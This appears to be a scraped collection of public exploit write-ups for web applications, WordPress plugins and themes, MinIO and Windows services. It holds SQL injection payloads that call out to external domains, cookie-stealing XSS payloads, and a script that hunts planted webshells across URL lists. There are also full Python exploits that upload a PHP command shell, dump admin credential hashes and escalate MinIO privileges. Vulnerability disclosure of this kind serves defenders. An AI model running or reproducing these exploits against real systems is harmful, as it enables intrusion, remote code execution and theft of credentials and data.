## Software: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The cityedit parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'
was submitted in the cityedit parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed.
The attacker can get all information from the system by using this
vulnerability!

STATUS: HIGH- Vulnerability

[+]Payload:
```mysql
---
Parameter: cityedit (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
    Payload: cityedit=22'+(select
load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''
RLIKE (SELECT (CASE WHEN (1759=1759) THEN 0x3232+(select
load_file(0x5c5c5c5c726a6564686468666a3662336a3175736a30656f696978343376396f786b6c626f7a666d3561752e6f6173746966792e636f6d5c5c656969))+''
ELSE 0x28 END)) AND 'GMzs'='GMzs

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: cityedit=22'+(select
load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''
OR (SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT
(ELT(8880=8880,1))),0x7178626271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qJHK'='qJHK

    Type: time-based blind
    Title: MySQL > 5.0.12 AND time-based blind (heavy query)
    Payload: cityedit=22'+(select
load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''
AND 2124=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,
INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR
1) AND 'Jtnd'='Jtnd
---
```
HireHackking 
# Exploit Title: Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS)
# Date: 22 March 2024
# Exploit Author: Erdemstar
# Vendor: https://wordpress.com/
# Version: 1.3.1

# Proof Of Concept:
1. Click Add New Watermark and enter the XSS payload into the Watermark Text.
2. Stored XSS will run on anyone who wants to edit this page.

# Vulnerable Property: watermark_title
# PoC Video: https://youtu.be/XEe0Sno6e2g?si=mcgO6VbAwymGXcCp
# Request:
POST /wp-admin/post.php HTTP/2
Host: erdemstar.local
Cookie: wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7C50573cb574c70a41a241cb9f1f1e3ff22f539fc8630599f2503d02a6c1a7e678; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wp-settings-time-4=1711124335; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7Cdae14d9d9aa7f0c4df03783bb2bd321a5b3d6a63d8c3e1ae131dda689c595862; wp-settings-time-5=1711124723
Content-Length: 1460
Upgrade-Insecure-Requests: 1
Origin: https://erdemstar.local
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: https://erdemstar.local/wp-admin/post-new.php?post_type=watermark&wp-post-new-reload=true
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i

_wpnonce=99a1d1e63a&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dwatermark&user_ID=5&action=editpost&originalaction=editpost&post_author=5&post_type=watermark&original_post_status=auto-draft&referredby=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&_wp_original_http_referer=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&auto_draft=1&post_ID=35&meta-box-order-nonce=ea875c0c6f&closedpostboxesnonce=d29be25ad8&post_title=&samplepermalinknonce=1e667edd3a&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=03&jj=22&aa=2024&hh=16&mn=25&ss=23&hidden_mm=03&cur_mm=03&hidden_jj=22&cur_jj=22&hidden_aa=2024&cur_aa=2024&hidden_hh=16&cur_hh=16&hidden_mn=25&cur_mn=25&original_publish=Publish&publish=Publish&tax_input%5BCategories%5D%5B%5D=0&post_name=&custom_meta_box_nonce=d1322f94a0&watermark_title=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&img_sizes%5B%5D=thumbnail&img_sizes%5B%5D=medium&img_sizes%5B%5D=large&img_sizes%5B%5D=full&txt_type=ARIAL.TTF&rgb=38%2C1%2C24&txt_size=8&color=%23260118&rotation=&opicity=100&position=top&destance_x=&mesaure_x=px&padding=&mesaure_y=px&background=yes&rgb_bg=255%2C0%2C0&bg_destance_x=&bg_padding=&color_bg=%23ff0000&image=&img_rotation=&img_opicity=100&img_position=top&img_size=4&img_destance_x=&img_mesaure_x=px&img_padding=&img_mesaure_y=px
HireHackking 
# Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload
# Date: 2024-04-01
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox

import sys
import os.path
import requests
import re
import urllib3
from requests.exceptions import SSLError
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore, init
init(autoreset=True)
error_color = Fore.RED
info_color = Fore.CYAN
success_color = Fore.GREEN
highlight_color = Fore.MAGENTA
requests.urllib3.disable_warnings()
headers = {
    'Connection': 'keep-alive',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M;
wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107
Mobile Safari/537.36',
    'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',

    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
    'Referer': 'www.google.com'
}
def URLdomain(url):
    if url.startswith("http://"):
        url = url.replace("http://", "")
    elif url.startswith("https://"):
        url = url.replace("https://", "")
    if '/' in url:
        url = url.split('/')[0]
    return url
def check_security(url):
    fg = success_color
    fr = error_color
    try:
        url = 'http://' + URLdomain(url)
        check = requests.get(url +
'/wp-content/themes/travelscape/json.php', headers=headers,
allow_redirects=True, timeout=15)
        if 'MSQ_403' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('MSQ_403.txt', 'a').write(url +
'/wp-content/themes/travelscape/json.php\n')
        else:
            url = 'https://' + URLdomain(url)
            check = requests.get(url +
'/wp-content/themes/aahana/json.php', headers=headers,
allow_redirects=True, verify=False, timeout=15)
            if 'MSQ_403' in check.text:
                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
                open('MSQ_403.txt', 'a').write(url +
'/wp-content/themes/aahana/json.php\n')
            else:
                print(' -| ' + url + ' --> {}[Failed]'.format(fr))
        check = requests.get(url + '/wp-content/themes/travel/issue.php',
headers=headers, allow_redirects=True, timeout=15)
        if 'Yanz Webshell!' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url +
'/wp-content/themes/travel/issue.php\n')
        else:
            url = 'https://' + URLdomain(url)
        check = requests.get(url + '/about.php', headers=headers,
allow_redirects=True, timeout=15)
        if 'Yanz Webshell!' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url + '/about.php\n')
        else:
            url = 'https://' + URLdomain(url)
        check = requests.get(url +
'/wp-content/themes/digital-download/new.php', headers=headers,
allow_redirects=True, timeout=15)
        if '#0x2525' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('digital-download.txt', 'a').write(url +
'/wp-content/themes/digital-download/new.php\n')
        else:
            print(' -| ' + url + ' --> {}[Failed]'.format(fr))
            url = 'http://' + URLdomain(url)
        check = requests.get(url + '/epinyins.php', headers=headers,
allow_redirects=True, timeout=15)
        if 'Uname:' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url + '/epinyins.php\n')
        else:
            print(' -| ' + url + ' --> {}[Failed]'.format(fr))
            url = 'https://' + URLdomain(url)
        check = requests.get(url + '/wp-admin/dropdown.php',
headers=headers, allow_redirects=True, verify=False, timeout=15)
        if 'Uname:' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')
        else:
            url = 'https://' + URLdomain(url)
            check = requests.get(url +
'/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,
allow_redirects=True, verify=False, timeout=15)
            if 'Simple Shell' in check.text:
                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
                open('dummyyummy.txt', 'a').write(url +
'/wp-content/plugins/dummyyummy/wp-signup.php\n')
            else:
                print(' -| ' + url + ' --> {}[Failed]'.format(fr))
    except Exception as e:
        print(f' -| {url} --> {fr}[Failed] due to: {e}')
def main():
    try:
        url_file_path = sys.argv[1]
    except IndexError:
        url_file_path = input(f"{info_color}Enter the path to the file
containing URLs: ")
        if not os.path.isfile(url_file_path):
            print(f"{error_color}[ERROR] The specified file path is
invalid.")
            sys.exit(1)
    try:
        urls_to_check = [line.strip() for line in open(url_file_path, 'r',
encoding='utf-8').readlines()]
    except Exception as e:
        print(f"{error_color}[ERROR] An error occurred while reading the
file: {e}")
        sys.exit(1)
    pool = ThreadPool(20)
    pool.map(check_security, urls_to_check)
    pool.close()
    pool.join()
    print(f"{info_color}Security check process completed successfully.
Results are saved in corresponding files.")
if __name__ == "__main__":
    main()
HireHackking 
# Exploit Title: AnyDesk 7.0.15 - Unquoted Service Path
# Date: 2024-04-01
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Vendor Homepage: http://anydesk.com
# Software Link: http://anydesk.com/download
# Version: Software Version 7.0.15
# Tested on: Windows 10 Pro x64

1. Description:

The Anydesk installs as a service with an unquoted service path running
with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.

2. Proof

C:\>sc qc anydesk
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: anydesk
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe"
--service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : AnyDesk Service
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : LocalSystem


C:\>systeminfo

OS Name:  Microsoft Windows 10 Pro
OS Version: 10.0.19045 N/A Build 19045
OS Manufacturer: Microsoft Corporation
HireHackking 
## Title: Best Student Result Management System v1.0 - Multiple SQLi
## Author: nu11secur1ty
## Date: 04/08/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The nid parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+'
was submitted in the nid parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed.
The attacker can get all information from the system by using this
vulnerability!

STATUS: HIGH- Vulnerability

[+]Payload:
```mysql
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=145448807' or '1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: nid=145448807' or '1766'='1766';SELECT SLEEP(7)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: nid=145448807' or '1766'='1766' AND (SELECT 3474 FROM
(SELECT(SLEEP(7)))eAdm) AND 'ubZR'='ubZR

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: nid=145448807' or '1766'='1766' UNION ALL SELECT
NULL,NULL,CONCAT(0x716a767871,0x76504a4f6455624669506c6a484150727767554e66574d7856554875684368426b4f72794374496e,0x716b787071),NULL#
---
```
HireHackking 
# Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi
# Date: February 25th, 2024
# Exploit Author: Stefan Hesselman
# Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/
# Software Link: https://download-media.code-projects.org/2020/01/DAILY_EXPENSE_MANAGER_IN_PHP_WITH_SOURCE_CODE.zip
# Version: 1.0
# Tested on: Kali Linux
# CVE: N/A
# CWE: CWE-89, CWE-74

## Description
Daily Expense Manager is vulnerable to SQL injection attacks. The affected HTTP parameter is the 'term' parameter. Any remote, unauthenticated attacker 
can exploit the vulnerability by injecting additional, malicious SQL queries to be run on the database.

## Vulnerable endpoint:
http://example.com/Daily-Expense-Manager/readxp.php?term=asd

## Vulnerable HTTP parameter:
term (GET)

## Exploit proof-of-concept:
http://example.com/Daily-Expense-Manager/readxp.php?term=asd%27%20UNION%20ALL%20SELECT%201,@@version,3,4,5,6--%20-

## Vulnerable PHP code:
File: /Daily-Expense-Manager/readxp.php, Lines: 16-23
<?php
[...]
//get search term
$searchTerm = $_GET['term']; # unsanitized and under control of the attacker.
//get matched data from skills table
$query = $conn->query("SELECT * FROM expense WHERE pname like '%$searchTerm%' AND uid='$sid' and isdel='0' group by pname");
while ($row = $query->fetch_assoc()) {
    $data[] = $row['pname'];
}
//return json data
echo json_encode($data);
?>
HireHackking 
# Exploit Title: GUnet OpenEclass E-learning platform 3.15 - 'certbadge.php' Unrestricted File Upload
# Date: 2024-02-04
# Exploit Author: Georgios Tsimpidas
# Vendor Homepage: https://www.openeclass.org/
# Software Link: https://download.openeclass.org/files/3.15/
# Version: 3.15 (2024)
# Tested on: Debian Kali (Apache/2.4.57, PHP 8.2.12, MySQL 15.1)
# CVE : CVE-2024-31777
# GUnet OpenEclass <= 3.15 E-learning platform - Unrestricted File

import requests
import argparse
import zipfile
import os
import sys

RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RESET = '\033[0m'
ORANGE = '\033[38;5;208m'

MALICIOUS_PAYLOAD = """\
<?php

if(isset($_REQUEST['cmd'])){
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        die;
}

?>
"""

def banner():
    print(f'''{RED}
{YELLOW}
 ============================ Author: Frey ============================
{RESET}''')

def execute_command(openeclass, filename):
    while True:
        # Prompt for user input with "eclass"
        cmd = input(f"{RED}[{YELLOW}eClass{RED}]~# {RESET}")

        # Check if the command is 'quit', then break the loop
        if cmd.lower() == "quit":
            print(f"{ORANGE}\nExiting...{RESET}")
            clean_server(openeclass)
            sys.exit()

        # Construct the URL with the user-provided command
        url = f"{openeclass}/courses/user_progress_data/cert_templates/{filename}?cmd={cmd}"

        # Execute the GET request
        try:
            response = requests.get(url)

            # Check if the request was successful
            if response.status_code == 200:
                # Print the response text
                print(f"{GREEN}{response.text}{RESET}")

        except requests.exceptions.RequestException as e:
            # Print any error that occurs during the request
            print(f"{RED}An error occurred: {e}{RESET}")

def upload_web_shell(openeclass, username, password):
    login_url = f'{openeclass}/?login_page=1'
    login_page_url = f'{openeclass}/main/login_form.php?next=%2Fmain%2Fportfolio.php'

    # Login credentials
    payload = {
        'next': '/main/portfolio.php',
        'uname': f'{username}',
        'pass': f'{password}',
        'submit': 'Enter'
    }

    headers = {
        'Referer': login_page_url,
    }

    # Use a session to ensure cookies are handled correctly
    with requests.Session() as session:
        # (Optional) Initially visit the login page if needed to get a fresh session cookie or any other required tokens
        session.get(login_page_url)

        # Post the login credentials
        response = session.post(login_url, headers=headers, data=payload)

        # Create a zip file containing the malicious payload
        zip_file_path = 'malicious_payload.zip'
        with zipfile.ZipFile(zip_file_path, 'w') as zipf:
            zipf.writestr('evil.php', MALICIOUS_PAYLOAD.encode())

        # Upload the zip file
        url = f'{openeclass}/modules/admin/certbadge.php?action=add_cert'
        files = {
            'filename': ('evil.zip', open(zip_file_path, 'rb'), 'application/zip'),
            'certhtmlfile': (None, ''),
            'orientation': (None, 'L'),
            'description': (None, ''),
            'cert_id': (None, ''),
            'submit_cert_template': (None, '')
        }
        response = session.post(url, files=files)

        # Clean up the zip file
        os.remove(zip_file_path)

        # Check if the upload was successful
        if response.status_code == 200:
            print(f"{GREEN}Payload uploaded successfully!{RESET}")
            return True
        else:
            print(f"{RED}Failed to upload payload. Exiting...{RESET}")
            return False

def clean_server(openeclass):
    print(f"{ORANGE}Cleaning server...{RESET}")
    # Remove the uploaded files
    requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.zip")
    requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.php")
    print(f"{GREEN}Server cleaned successfully!{RESET}")

def main():
    parser = argparse.ArgumentParser(description="Open eClass – CVE-CVE-2024-31777: Unrestricted File Upload Leads to Remote Code Execution")
    parser.add_argument('-u', '--username', required=True, help="Username for login")
    parser.add_argument('-p', '--password', required=True, help="Password for login")
    parser.add_argument('-e', '--eclass', required=True, help="Base URL of the Open eClass")
    args = parser.parse_args()

    banner()
    # Running the main login and execute command function
    if upload_web_shell(args.eclass, args.username, args.password):
        execute_command(args.eclass, 'evil.php')

if __name__ == "__main__":
    main()
HireHackking 
# Exploit Title : Open Source Medicine Ordering System v1.0 - SQLi
# Author : Onur Karasalihoğlu
# Date : 27/02/2024
# Sample Usage

% python3 omos_sqli_exploit.py https://target.com
Available Databases:
1. information_schema
2. omosdb
Please select a database to use (enter number): 2
You selected: omosdb
Extracted Admin Users Data:
1 | Adminstrator | Admin |  | 0192023a7bbd73250516f069df18b500 | admin
2 | John | Smith | D | 1254737c076cf867dc53d60a0364f38e | jsmith
'''

import requests
import re
import sys

def fetch_database_names(domain):
    url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',schema_name)),'enforsec')%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20-"
    
    try:
        # HTTP request
        response = requests.get(url)
        response.raise_for_status()  # exception for 4xx and 5xx requests
        
        # data extraction
        pattern = re.compile(r'enforsec\["(.*?)"\]enforsec')
        extracted_data = pattern.search(response.text)
        if extracted_data:
            databases = extracted_data.group(1).split(',')
            databases = [db.replace('"', '') for db in databases]
            print("Available Databases:")
            for i, db in enumerate(databases, start=1):
                print(f"{i}. {db}")
            
            # users should select omos database
            choice = int(input("Please select a database to use (enter number): "))
            if 0 < choice <= len(databases):
                selected_db = databases[choice - 1]
                print(f"You selected: {selected_db}")
                fetch_data(domain, selected_db)
            else:
                print("Invalid selection.")
        else:
            print("No data extracted.")
    except requests.RequestException as e:
        print(f"HTTP Request failed: {e}")

def fetch_data(domain, database_name):
    url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',`type`,firstname,lastname,middlename,password,username)),'enforsec') FROM {database_name}.users-- -"
    
    try:
        # HTTP request
        response = requests.get(url)
        response.raise_for_status()  # exception for 4xx and 5xx requests
        
        # data extraction
        pattern = re.compile(r'enforsec\[(.*?)\]enforsec')
        extracted_data = pattern.search(response.text)
        if extracted_data:
            print("Extracted Admin Users Data:")
            data = extracted_data.group(1)
            rows = data.split('","')
            for row in rows:
                clean_row = row.replace('"', '')
                user_details = clean_row.split(',')
                print(" | ".join(user_details))
        else:
            print("No data extracted.")
    except requests.RequestException as e:
        print(f"HTTP Request failed: {e}")

def main():
    if len(sys.argv) != 2:
        print("Usage: python3 omos_sqli_exploit.py <domain>")
        sys.exit(1)

    fetch_database_names(sys.argv[1])

if __name__ == "__main__":
    main()
HireHackking 
# Exploit Title:  Terratec dmx_6fire USB - Unquoted Service Path
# Google Dork: null
# Date: 4/10/2024
# Exploit Author: Joseph Kwabena Fiagbor
# Vendor Homepage: https://dmx-6fire-24-96-controlpanel.software.informer.com/download/
# Software Link:
# Version: v.1.23.0.02
# Tested on: windows 7-11
# CVE : CVE-2024-31804

1. Description:

The Terratec dmx_6fire usb installs as a service with an unquoted service
path running
with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.

2. Proof

> C:\Users\Astra>sc qc "ttdmx6firesvc"
> {SC] QueryServiceConfig SUCCESS
>
> SERVICE_NAME: ttdmx6firesvc
>         TYPE               : 10  WIN32_OWN_PROCESS
>         START_TYPE         : 2   AUTO_START
>         ERROR_CONTROL      : 1   NORMAL
>         BINARY_PATH_NAME   : C:\Program Files\TerraTec\DMX6FireUSB\ttdmx6firesvc.exe -service
>         LOAD_ORDER_GROUP   : PlugPlay
>         TAG                : 0
>         DISPLAY_NAME       : DMX6Fire Control
>         DEPENDENCIES       : eventlog
>                            : PlugPlay
>         SERVICE_START_NAME : LocalSystem
>
>
HireHackking 
# Exploit Title: MinIO < 2024-01-31T20-20-33Z -  Privilege Escalation
# Date: 2024-04-11
# Exploit Author: Jenson Zhao
# Vendor Homepage: https://min.io/
# Software Link: https://github.com/minio/minio/
# Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z
# Tested on: Windows 10
# CVE : CVE-2024-24747
# Required before execution: pip install minio,requests

import argparse
import datetime
import traceback
import urllib
from xml.dom.minidom import parseString
import requests
import json
import base64
from minio.credentials import Credentials
from minio.signer import sign_v4_s3

class CVE_2024_24747:
    new_buckets = []
    old_buckets = []
    def __init__(self, host, port, console_port, accesskey, secretkey, verify=False):
        self.bucket_names = ['pocpublic', 'pocprivate']
        self.new_accesskey = 'miniocvepoc'
        self.new_secretkey = 'MINIOcvePOC'
        self.headers = {
          'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',
          'Content-Type': 'application/json',
          'Accept': '*/*'
        }
        self.accesskey = accesskey
        self.secretkey = secretkey
        self.verify = verify
        if verify:
            self.url = "https://" + host + ":" + port
            self.console_url = "https://" + host + ":" + console_port
        else:
            self.url = "http://" + host + ":" + port
            self.console_url = "http://" + host + ":" + console_port
        self.credits = Credentials(
            access_key=self.new_accesskey,
            secret_key=self.new_secretkey
        )
        self.login()
        try:
            self.create_buckets()
            self.create_accesskey()
            self.old_buckets = self.console_ls()
            self.console_exp()
            self.new_buckets = self.console_ls()

        except:
            traceback.print_stack()
        finally:
            self.delete_accesskey()
            self.delete_buckets()
            if len(self.new_buckets) > len(self.old_buckets):
                print("There is CVE-2024-24747 problem with the minio!")
                print("Before the exploit, the buckets are : " + str(self.old_buckets))
                print("After the exploit, the buckets are : " + str(self.new_buckets))
            else:
                print("There is no CVE-2024-24747 problem with the minio!")

    def login(self):
        url = self.url + "/api/v1/login"
        payload = json.dumps({
          "accessKey": self.accesskey,
          "secretKey": self.secretkey
        })
        self.session = requests.session()
        if self.verify:
            self.session.verify = False
        status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code
        # print(status_code)
        if status_code == 204:
            status_code = 0
        else:
            print('Login failed! Please check if the input accesskey and secretkey are correct!')
            exit(1)
    def create_buckets(self):
        url = self.url + "/api/v1/buckets"
        for name in self.bucket_names:
            payload = json.dumps({
                "name": name,
                "versioning": False,
                "locking": False
            })
            status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code
            # print(status_code)
            if status_code == 200:
                status_code = 0
            else:
                print("新建 (New)"+name+" bucket 失败 (fail)!")
    def delete_buckets(self):
        for name in self.bucket_names:
            url = self.url + "/api/v1/buckets/" + name
            status_code = self.session.request("DELETE", url, headers=self.headers).status_code
            # print(status_code)
            if status_code == 204:
                status_code = 0
            else:
                print("删除 (delete)"+name+" bucket 失败 (fail)!")
    def create_accesskey(self):
        url = self.url + "/api/v1/service-account-credentials"
        payload = json.dumps({
            "policy": "{              \n    \"Version\":\"2012-10-17\",              \n    \"Statement\":[              \n        {              \n            \"Effect\":\"Allow\",              \n            \"Action\":[              \n                \"s3:*\"              \n            ],              \n            \"Resource\":[              \n                \"arn:aws:s3:::pocpublic\",              \n                \"arn:aws:s3:::pocpublic/*\"              \n            ]              \n        }              \n    ]              \n}",
            "accessKey": self.new_accesskey,
            "secretKey": self.new_secretkey
        })
        status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code
        # print(status_code)
        if status_code == 201:
            # print("新建 (New)" + self.new_accesskey + " accessKey 成功 (success)!")
            # print(self.new_secretkey)
            status_code = 0
        else:
            print("新建 (New)" + self.new_accesskey + " accessKey 失败 (fail)!")
    def delete_accesskey(self):
        url = self.url + "/api/v1/service-accounts/" + base64.b64encode(self.new_accesskey.encode("utf-8")).decode('utf-8')
        status_code = self.session.request("DELETE", url, headers=self.headers).status_code
        # print(status_code)
        if status_code == 204:
            # print("删除" + self.new_accesskey + " accessKey成功!")
            status_code = 0
        else:
            print("删除 (delete)" + self.new_accesskey + " accessKey 失败 (fail)!")
    def headers_gen(self,url,sha256,method):
        datetimes = datetime.datetime.utcnow()
        datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')
        urls = urllib.parse.urlparse(url)
        headers = {
            'X-Amz-Content-Sha256': sha256,
            'X-Amz-Date': datetime_str,
            'Host': urls.netloc,
        }
        headers = sign_v4_s3(
            method=method,
            url=urls,
            region='us-east-1',
            headers=headers,
            credentials=self.credits,
            content_sha256=sha256,
            date=datetimes,
        )
        return headers
    def console_ls(self):
        url = self.console_url + "/"
        sha256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
        headers = self.headers_gen(url,sha256,'GET')
        if self.verify:
            response = requests.get(url,headers=headers,verify=False)
        else:
            response = requests.get(url, headers=headers)
        DOMTree = parseString(response.text)
        collection = DOMTree.documentElement
        buckets = collection.getElementsByTagName("Bucket")
        bucket_names = []
        for bucket in buckets:
            bucket_names.append(bucket.getElementsByTagName("Name")[0].childNodes[0].data)
        # print('当前可查看的bucket有:\n' + str(bucket_names))
        return bucket_names

    def console_exp(self):
        url = self.console_url + "/minio/admin/v3/update-service-account?accessKey=" + self.new_accesskey
        sha256 = "0f87fd59dff29507f82e189d4f493206ea7f370d0ce97b9cc8c1b7a4e609ec95"
        headers = self.headers_gen(url, sha256, 'POST')
        hex_string = "e1fd1c29bed167d5cf4986d3f224db2994b4942291dbd443399f249b84c79d9f00b9e0c0c7eed623a8621dee64713a3c8c63e9966ab62fcd982336"
        content = bytes.fromhex(hex_string)
        if self.verify:
            response = requests.post(url,headers=headers,data=content,verify=False)
        else:
            response = requests.post(url,headers=headers,data=content)
        status_code = response.status_code
        if status_code == 204:
            # print("提升" + self.new_accesskey + " 权限成功!")
            status_code = 0
        else:
            print("提升 (promote)" + self.new_accesskey + " 权限失败 (Permission failed)!")

if __name__ == '__main__':
    logo = """ 
                           ____    ___   ____   _  _           ____   _  _    _____  _  _    _____ 
  ___ __   __  ___        |___ \  / _ \ |___ \ | || |         |___ \ | || |  |___  || || |  |___  |
 / __|\ \ / / / _ \ _____   __) || | | |  __) || || |_  _____   __) || || |_    / / | || |_    / / 
| (__  \ V / |  __/|_____| / __/ | |_| | / __/ |__   _||_____| / __/ |__   _|  / /  |__   _|  / /  
 \___|  \_/   \___|       |_____| \___/ |_____|   |_|         |_____|   |_|   /_/      |_|   /_/   
                            """
    print(logo)
    parser = argparse.ArgumentParser()
    parser.add_argument("-H", "--host", required=True, help="Host of the target. example: 127.0.0.1")
    parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")
    parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")
    parser.add_argument("-c", "--console_port", required=True, help="Minio console port of the target. example: 9000")
    parser.add_argument("-p", "--port", required=True, help="Minio port of the target. example: 9090")
    parser.add_argument("--https", action='store_true', help="Is MinIO accessed through HTTPS.")
    args = parser.parse_args()
    CVE_2024_24747(args.host,args.port,args.console_port,args.accesskey,args.secretkey,args.https)
HireHackking 
# Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS)
# Date: 22 March 2024
# Exploit Author: Erdemstar
# Vendor: https://wordpress.com/
# Version: 1.32

# Proof Of Concept:
1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or "Playlist ID".

# PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns
# Vulnerable Properties name: name, playlist_id
# Payload: "><script>alert(document.cookie)</script>
# Request:
POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2
Host: erdemstar.local
